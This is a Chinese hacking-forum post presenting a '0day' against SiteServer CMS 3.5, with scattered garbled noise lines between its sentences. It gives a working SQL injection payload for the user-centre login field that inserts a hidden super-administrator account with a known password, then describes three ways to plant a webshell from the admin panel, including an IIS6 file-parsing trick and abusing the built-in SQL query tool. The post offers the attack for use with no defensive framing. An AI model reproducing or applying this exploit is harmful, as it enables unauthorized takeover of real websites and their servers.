中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
& [1 s4 U! T/ @! \3 |4 [$ [7 y/ \* C- \
0 C4 X' D$ Y* q' {0 ^  l) Q0 N$ rstieserver官网:www.siteserver.cn
) q  r" O" B3 i
4 N: y7 F$ x. m* t3 G( Y0 Y
$ }" g' `2 Z/ W$ y4 I
EXP:

8 t! h: G9 W$ v' ^) G- z, @. O直接访问UserCenter/login.aspx

( T" W/ h' l3 r0 C0 O4 C) L

用户名处输入：

" R$ S) ^/ Z; o: V123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
6 A( X0 |- @4 [9 }' _1 m
: z4 U/ x* t% X

/ n4 z# a: B' R+ v6 S) P密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

. {! N, [8 L" R5 Z; n6 k4 G7 B( O/ o
1 H5 q# f: e% M* E9 t
之后再访问后台SiteServer/login.aspx用插入的用户登陆
  G, B- G7 y5 G' S. q; J, A7 n
5 u* h: z" z7 ]0 D! B
3 d8 K1 N$ P- w2 q- o7 ?/ S
后台拿webshell的三种方法：

' e( y/ c/ |' o# d3 U一、

: W( C" s; l6 `) F. f7 U站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
9 w3 T; b& v4 A2 E! i% }2 ^6 ?
成员权限-》添加用户-》用户名为：1.asp

9 q! Y- @; t% S3 u1 n: j- O9 ~http://127.0.0.1/usercenter/

4 ~: b; ?2 m" Z  o& S# X: y用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
4 Z  Y6 R" `3 t+ \( W
# S- ^8 n$ Z0 u/ ~（ps：后台添加用户时不会验证是否含有非法字符）

三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

* T& B* |, p! I/ |9 U: n系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2